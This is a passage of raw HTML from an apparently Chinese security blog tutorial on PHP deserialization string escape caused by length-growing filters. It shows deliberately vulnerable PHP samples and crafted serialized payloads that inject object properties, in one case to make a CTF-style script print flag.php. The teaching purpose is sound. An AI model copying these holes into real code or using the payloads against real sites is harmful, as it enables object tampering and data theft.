href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"98\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=98\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-68-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-98\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ued0e1345\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69-1024x244.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"244\" data-attachment-id=\"99\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=99\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69.png\" data-orig-size=\"1850,440\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69-300x71.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69-1024x244.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-69-1024x244.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-99\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"rKq4X\">\u5b57\u7b26\u4e32\u589e\u591a<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"jE2nS\">\u793a\u4f8b\u4ee3\u7801<\/h5>\n\n\n\n<pre id=\"lUxE1\" class=\"wp-block-code\"><code>&lt;?php\nclass A{\n    public $v1 = 'ls';\n    public $v2 = '123';\n    public function __construct($arga,$argc){\n        $this-&gt;v1 = $arga;\n        $this-&gt;v2 = $argc;\n    }\n}\n$a = $_GET&#91;'v1'];\n$b = $_GET&#91;'v2'];\n$data =  serialize(new A($a,$b));\n$data = str_replace(\"ls\",\"pwd\",$data);\nvar_dump(unserialize($data));<\/code><\/pre>\n\n\n\n<p id=\"u5355cab3\">PHP \u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u662f\u4e25\u683c\u4f9d\u8d56\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u4e2d\u7684 \u957f\u5ea6\u6807\u8bc6\uff08\u5982 s:5:&quot;value&quot; \u4e2d\u7684 5\uff09\u6765\u5224\u65ad\u5b57\u7b26\u4e32\u5728\u54ea\u91cc\u7ed3\u675f\u7684<\/p>\n\n\n\n<p 
id=\"udc926c25\">\u8fd9\u6bb5\u4ee3\u7801\u4e2d\u5b58\u5728serialize\u540e\u7d27\u63a5\u7740str_replace\u7684\u64cd\u4f5c\uff0c\u4e14\u66ff\u6362\u540e\u7684\u5b57\u7b26\u4e32\u957f\u5ea6\u53d1\u751f\u4e86\u53d8\u5316\uff08\u672c\u4f8b\u4e2d ls \u2192 pwd\uff0c\u957f\u5ea6\u7531 2 \u53d8\u4e3a 3\uff09\uff0c\u5c31\u4f1a\u5bfc\u81f4\u5b9e\u9645\u5b57\u7b26\u4e32\u5185\u5bb9\u6bd4\u957f\u5ea6\u6807\u8bc6\u6240\u8bb0\u5f55\u7684\u66f4\u957f<\/p>\n\n\n\n<p id=\"ud822b908\">\u8fd9\u5c31\u7ed9\u4e86\u653b\u51fb\u8005\u4e00\u4e2a\u673a\u4f1a\uff1a\u5229\u7528\u589e\u52a0\u51fa\u7684\u957f\u5ea6\uff0c\u5c06\u539f\u672c\u5c5e\u4e8e\u201c\u503c\u201d\u7684\u4e00\u90e8\u5206\u5185\u5bb9\u6324\u51fa\u53bb\uff0c\u4f7f\u5176\u88ab\u53cd\u5e8f\u5217\u5316\u89e3\u6790\u5668\u8bc6\u522b\u4e3a\u7ed3\u6784\u4ee3\u7801\uff08\u5982\u5c5e\u6027\u540d\u6216\u5bf9\u8c61\u7ed3\u675f\u7b26\uff09\uff0c\u4ece\u800c\u7be1\u6539\u5bf9\u8c61\u7684\u5c5e\u6027\u3002\u6839\u672c\u539f\u56e0\u662f\u8fc7\u6ee4\u4f5c\u7528\u5728\u5e8f\u5217\u5316\u540e\u7684\u5b57\u7b26\u4e32\u4e0a\uff1b\u82e5\u5728 serialize \u4e4b\u524d\u8fc7\u6ee4\u539f\u59cb\u8f93\u5165\uff0c\u957f\u5ea6\u6807\u8bc6\u4e0e\u5185\u5bb9\u5c31\u4e0d\u4f1a\u5931\u914d\u3002<\/p>\n\n\n\n<p id=\"ue3d1c8f3\">\u8fd9\u9053\u9898\u4e2d\u539f\u59cb\u5b57\u7b26\uff1als\u662f\u4e24\u4e2a\u5b57\u7b26 \u66ff\u6362\u6210\u4e86pwd\u5c31\u662f3\u4e2a\u5b57\u7b26 \u5dee\u503c\u4e3a1<\/p>\n\n\n\n<p id=\"u66f0c36d\">\u6211\u4eec\u8981\u901a\u8fc7\u63a7\u5236 $v1 \u7684\u8f93\u5165\uff0c\u6765\u63a7\u5236 $v2 \u7684\u503c\uff0c\u4f8b\u5982\u5c06 $v2 \u7684\u503c\u4ece\u9ed8\u8ba4\u7684 123 \u4fee\u6539\u4e3a hacked<\/p>\n\n\n\n<pre id=\"ar8SV\" class=\"wp-block-code\"><code>\";s:2:\"v2\";s:6:\"hacked\";}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1003\" height=\"753\" 
data-attachment-id=\"100\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=100\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70.png\" data-orig-size=\"1003,753\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70-300x225.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-70.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-100\"  sizes=\"auto, (max-width: 1003px) 100vw, 1003px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u725f2d5b\">\u6211\u4eec\u6784\u9020\u51fa\u6765\u7684payload\u957f\u5ea6\u4e3a25\uff0c\u90a3\u4e48\u6211\u4eec\u8981\u5728\u524d\u9762\u52a0\u4e0a25\u4e2als<\/p>\n\n\n\n<pre id=\"dVNcx\" class=\"wp-block-code\"><code>lslslslslslslslslslslslslslslslslslslslslslslslsls\";s:2:\"v2\";s:6:\"hacked\";}<\/code><\/pre>\n\n\n\n<p id=\"u236377ba\">\u7ed9v1\u8d4b\u503c\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71-1024x451.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"451\" data-attachment-id=\"101\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=101\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71.png\" data-orig-size=\"1919,845\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71-300x132.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71-1024x451.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-71-1024x451.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-101\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u04e798e1\">\u5b57\u7b26\u4e32\u66ff\u6362\u540e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72-1024x493.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"493\" data-attachment-id=\"102\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=102\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72.png\" data-orig-size=\"1918,923\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72-300x144.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72-1024x493.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-72-1024x493.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-102\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73-1024x493.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"493\" data-attachment-id=\"103\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=103\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73.png\" data-orig-size=\"1918,923\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73-300x144.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73-1024x493.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-73-1024x493.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-103\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u2009f467\">\u6210\u529f\u9003\u9038\uff0c\u5c06hacked\u8d4b\u503c\u7ed9\u4e86$v2<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"OgDIA\">\u4f8b\u9898<\/h5>\n\n\n\n<pre id=\"IVEgc\" class=\"wp-block-code\"><code>&lt;?php\nfunction filter($name){\n    $safe=array(\"flag\",\"php\");\n    $name=str_replace($safe,\"hack\",$name);\n    return $name;\n}\nclass test{\n    var $user;\n    var $pass='daydream';\n    
function __construct($user){\n        $this-&gt;user=$user;\n    }\n}\n$param=$_GET&#91;'param'];\n$param=serialize(new test($param));\n$profile=unserialize(filter($param));\n\nif ($profile-&gt;pass=='escaping'){\n    echo file_get_contents(\"flag.php\");\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u6e211551\">\u8fd9\u91cc\u4f1a\u5c06php[3\u5b57\u7b26]\u66ff\u6362\u6210hack[4\u5b57\u7b26]\uff0c\u5dee\u503c\u4e3a1<\/p>\n\n\n\n<p id=\"u36b5cc32\">\u8fd9\u91cc\u8f93\u51faflag\u7684\u6761\u4ef6\u662f$profile-&gt;pass==&#8217;escaping&#8217;<\/p>\n\n\n\n<p id=\"u10881d86\">\u6211\u4eec\u751f\u6210\u4e00\u4e2apayload<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74-1024x670.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"670\" data-attachment-id=\"104\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=104\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74.png\" data-orig-size=\"1459,955\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74-300x196.png\" 
data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74-1024x670.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-74-1024x670.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-104\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre id=\"m0h6k\" class=\"wp-block-code\"><code>\";s:4:\"pass\";s:8:\"escaping\";}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1003\" height=\"753\" data-attachment-id=\"105\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=105\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75.png\" data-orig-size=\"1003,753\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75-300x225.png\" 
data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-75.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-105\"  sizes=\"auto, (max-width: 1003px) 100vw, 1003px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ub5fcf8e9\">\u957f\u5ea6\u4e3a29\uff0c\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u9700\u8981\u8f93\u516529\u4e2aphp<\/p>\n\n\n\n<p id=\"uf77bd47b\">\u53cd\u5e8f\u5217\u5316\u7ed3\u679c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76-1024x412.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"412\" data-attachment-id=\"106\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=106\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76.png\" data-orig-size=\"1911,768\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" 
data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76-300x121.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76-1024x412.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-76-1024x412.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-106\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u75d079d2\">\u8fc7\u6ee4\u66ff\u6362<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77-1024x450.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"450\" data-attachment-id=\"107\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=107\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77.png\" data-orig-size=\"1919,844\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77-300x132.png\" 
data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77-1024x450.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-77-1024x450.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-107\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u287defdd\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-78-1024x506.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"506\" data-attachment-id=\"108\" 